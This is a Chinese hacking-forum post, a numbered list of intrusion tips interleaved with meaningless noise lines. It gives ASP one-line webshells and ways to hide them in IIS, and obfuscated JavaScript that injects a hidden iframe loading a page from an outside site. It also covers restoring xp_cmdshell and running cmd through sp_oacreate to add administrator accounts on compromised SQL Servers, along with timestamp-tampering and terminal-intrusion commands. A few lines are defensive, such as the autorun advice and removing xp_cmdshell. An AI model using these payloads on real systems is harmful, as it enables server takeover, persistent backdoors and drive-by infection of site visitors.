50、autorun的病毒可以通过手动限制!
( t/ F! ?9 Q: m7 m8 `! G
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
) A( d! b+ `+ O6 h2 I( L5 Y7 b
2,打开盘符用右键打开!切忌双击盘符~
* p* n* [/ H$ J! R
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
4 r/ e6 w, z; }" S( }
|- O7 y5 y1 F8 x- M4 i- o1 I
51、log备份时的一句话木马:
5 e0 K+ P( s" R9 o4 }( Z' W9 S# n# c
a).<%%25Execute(request("go"))%%25>
O4 g' w9 f' o$ D9 Z* [* p; W
b).<%Execute(request("go"))%>
9 U2 D) D% H5 R. ^( |9 ^
c).%><%execute request("go")%><%
) b& X# f5 S" E/ ^$ s9 Z! I
d).<script language=VBScript runat=server>execute request("sb")</Script>
5 R; H5 i A0 S: L. o' w
e).<%25Execute(request("l"))%25>
; c* I$ \3 l0 \" L# x
f).<%if request("cmd")<>"" then execute request("pass")%>
; \- n0 }, B, O2 [
- W# }$ O+ e/ j0 o
52、at "12:17" /interactive cmd
0 ]( y, ]* }. Q1 _: M" J: ~
执行后可以用AT命令查看新加的任务
7 i% ]3 [8 @# ^& n
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
3 u+ R3 B! j& i7 N: t6 K
2 p+ _7 L+ }! _ t
53、隐藏ASP后门的两种方法
& N7 r6 {6 o, A7 ]6 K
1、建立非标准目录:mkdir images..\
. T4 a# @: X G2 y! }- O+ _# f
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
. u9 d0 ]3 N# s. Y! S: N2 f$ I7 {7 _) d
通过web访问ASP木马:http://ip/images../news.asp?action=login
s0 ?# X0 |# P6 H$ H
如何删除非标准目录:rmdir images..\ /s
]7 z! ^5 l8 h/ b8 g! {) q
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
$ N& x' v: Z+ z+ x$ N; M* {
mkdir programme.asp
( A+ ^' @( ~$ [; e9 Q+ S
新建1.txt文件内容:<!--#include file=”12.jpg”-->
) \. e: a9 O5 x/ t
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
8 h' u* g/ n) _
attrib +H +S programme.asp
) @! B0 R" ?( |: A
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
: H3 ~7 ~7 i; g" Q- F) {/ k
, B e# A0 A- b5 {; Z/ ~
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
- J* U; a s7 y8 G* I3 F/ [
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
" [) o* O" `& n" k/ |7 g2 D
y; W- N& w* [6 f3 h6 H
55、JS隐蔽挂马
0 T5 ^4 I8 X# Q6 M* Y7 ~& a
1.
1 O+ C. B u- d3 q) r
var tr4c3="<iframe src=ht";
* ^% {6 t1 t4 T' G7 {) A# h8 E @
tr4c3 = tr4c3+"tp:/";
: |8 e' x G2 Y2 k
tr4c3 = tr4c3+"/ww";
( s% p, Z ^# g
tr4c3 = tr4c3+"w.tr4";
" z* u' b- C; Y& T
tr4c3 = tr4c3+"c3.com/inc/m";
. X# T1 `- d3 o
tr4c3 = tr4c3+"m.htm style="display:none"></i";
) F$ h# o# v) U7 t, w$ A
tr4c3 =tr4c3+"frame>'";
* p" {/ O+ G) ]) |! k
document.write(tr4c3);
8 ]: _4 Z7 D2 q
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
9 X+ p+ t7 g0 u9 v
. W$ G- ]# g) T* i
2.
( J6 W N7 e) U( Q! w
转换进制,然后用EVAL执行。如
7 v( L$ }. ~7 n+ h6 n" a
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
; l+ z% `1 [( r% ], b3 h
不过这个有点显眼。
8 y9 d* U. P% u6 i
3.
/ L" p3 X8 z0 s: }" z
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
% g, i+ w- W+ X! P% ?
最后一点,别忘了把文件的时间也修改下。
1 n4 I* U5 h# `" A
/ m5 } P6 X4 C* G6 e
56.3389终端入侵常用DOS命令
B2 R i) O5 }& S' k
taskkill taskkill /PID 1248 /t
1 `7 \8 K9 l7 X7 b- L1 G& C
1 j$ _* {0 R- N& t/ |9 g
tasklist 查进程
: a+ I0 O, @1 ~8 ?6 n* C5 c, n+ R
. ?+ I6 y* R1 h$ t8 E% T, H' Q
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; s( E1 b9 o4 D7 |
iisreset /reboot
7 n% t) |! Q% T" T0 I
tsshutdn /reboot /delay:1 重起服务器
. B3 K# T% G8 K
; ~* ~% ^8 G' h" `" @" H
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
. F& Q! h; R8 W+ i3 P- \
& ]5 b ?) }. B3 K
query user 查看当前终端用户在线情况
" E) J( @$ }; \/ I8 T3 V
2 Y* u `7 E& }
要显示有关所有会话使用的进程的信息,请键入:query process *
5 P& Q# J$ |1 U$ {/ |! K
u6 e* ]( [" ?
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
9 l: |+ ?5 i4 R2 i
# H% n+ W# S% T' a
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
/ v: w7 ` G/ ~! N: ]6 ]8 {% l
3 X! R- }2 _- s- W' X4 c1 a2 n: f
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
5 i! J" X2 g9 z. X; V4 a6 z
- x" a) o+ j/ }% \' v1 [$ {" l! z; N
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
9 y; z$ }; z4 N2 k$ Y2 Z' x. i
- g- O) G3 }! z( R, _3 [6 g$ X2 S
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
" J' D" n& |7 {. j6 Y% B$ o
1 n# Y* G; w% n8 k& m( O
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
$ U' f7 { t& m
5 L5 N- q1 u: f; B: f: N- x( b
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
, ], I j% {9 e0 T; C
3 ?) o2 w3 a, i2 F9 m
56、在地址栏或按Ctrl+O,输入:
4 B7 a: Q0 z: f+ z& Y' D t0 X1 C8 K
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
9 R0 b# [' v1 x( @( E2 Y& h, A
4 v) K, |' K2 D' Y9 u! ]! m
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
& g0 E" u8 D2 D& E0 ]+ [4 S
5 F8 f6 e& P5 g0 `7 m
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
: E$ `* N6 a$ n' D
用net localgroup administrators是可以看到管理组下,加了$的用户的。
7 q/ b* G, A3 I/ ^9 ]
% J* c2 g- u" N. g. E
58、 sa弱口令相关命令
r2 G% E6 M* v8 C$ a
. [4 j9 R' _. t5 `5 O2 N
一.更改sa口令方法:
) Z$ C* g/ g9 L2 G% H
用sql综合利用工具连接后,执行命令:
; d8 e! P# h# S% y+ c- n8 t; M0 c
exec sp_password NULL,'20001001','sa'
8 i' A! U6 A5 g9 m& c$ V
(提示:慎用!)
9 N. {5 s. t3 ]$ P; G; b
/ a2 s D& t4 s" W' T; l, `4 u$ ^, H
二.简单修补sa弱口令.
) t; s- w5 |) y: [
1 p ] l7 {4 y$ I0 j0 d
方法1:查询分离器连接后执行:
0 o6 w! e5 P. e+ I9 _! O) {
if exists (select * from
: D. O, z2 N w' O5 c
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
: K! w- \4 t( f B
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
. o- D2 ~/ Q9 C
5 Y2 e2 N& u* O n; O, f
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
+ \7 {: n; x6 N3 s0 z0 R
+ [' k; J1 q5 a+ D' ~* h
GO
# U& r! }5 d# M, i' _
' t, d" w" Z- ?" d, v9 S
然后按F5键命令执行完毕
9 N( s' H8 w9 b2 @7 T
7 }% |8 v$ D1 r( a2 n1 M
方法2:查询分离器连接后
" Q* s+ y6 x2 \
第一步执行:use master
# {( _' {6 E0 y( y% d7 |% Y7 F
第二步执行:sp_dropextendedproc 'xp_cmdshell'
Z( e6 p' [* R
然后按F5键命令执行完毕
+ n1 y j% ^8 r7 {: A
" W3 D1 c* G: {0 {& t/ \" r
5 `/ Z) N% Z h7 k9 T
三.常见情况恢复执行xp_cmdshell.
4 a! T0 s. b. E, l
7 V4 `# H$ B. D5 R) U7 S
2 P' V) Q( t2 G& P; Y$ \- C
1 未能找到存储过程'master..xpcmdshell'.
0 I* w6 B; ]& n ?7 K! m: t) Y
恢复方法:查询分离器连接后,
# E% J0 ~5 G9 V9 H6 h" E4 g3 `
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
# Q1 T& F% D# C! K6 b. p4 I
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- x1 i j0 ~+ N
然后按F5键命令执行完毕
7 H0 w* \% K0 O- s! @! l" o3 m! y: B
* U% ^$ { Q! E" O+ `8 i
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
% o) _1 z d% \, y; n2 W
恢复方法:查询分离器连接后,
G9 x5 J, V( N
第一步执行:sp_dropextendedproc "xp_cmdshell"
0 {+ j& |9 c1 E
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# ` J3 G6 j5 o7 M1 J2 n
然后按F5键命令执行完毕
; x8 e. O p0 a7 A8 G, s) F* C5 y% D
! w! f8 P& X: x( P0 C$ T! o' a9 }
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. M; }4 H& v2 i0 `
恢复方法:查询分离器连接后,
) L* `- T" k& U6 n
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
- U5 t- C E& |; p
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
. T7 \: N' Z" M: N$ }2 H
然后按F5键命令执行完毕
' T; u/ g5 G0 B9 v* i
+ H' W% F5 a6 E
四.终极方法.
( X. \( X6 w' ~' Q- t- V
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
6 J! K. j9 h# x( s a0 z( E
查询分离器连接后,
( A/ |7 U, z1 g$ n8 z
2000servser系统:
: \( e! R" J$ n2 t& N0 d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
, Q+ Q8 ?8 U9 q: B
! S3 B0 W4 `1 O: f
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
( Y* B) u2 c4 g% L9 n' `
' c+ P. g) B$ G6 p7 f
xp或2003server系统:
. i- }3 v; o7 ^
( j% t8 N" q0 ?4 {2 h6 V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
1 e# c7 @: g2 {) J q9 {2 g# h
* o) q& X7 E$ X9 k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
% y; V8 @4 S/ K& L
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2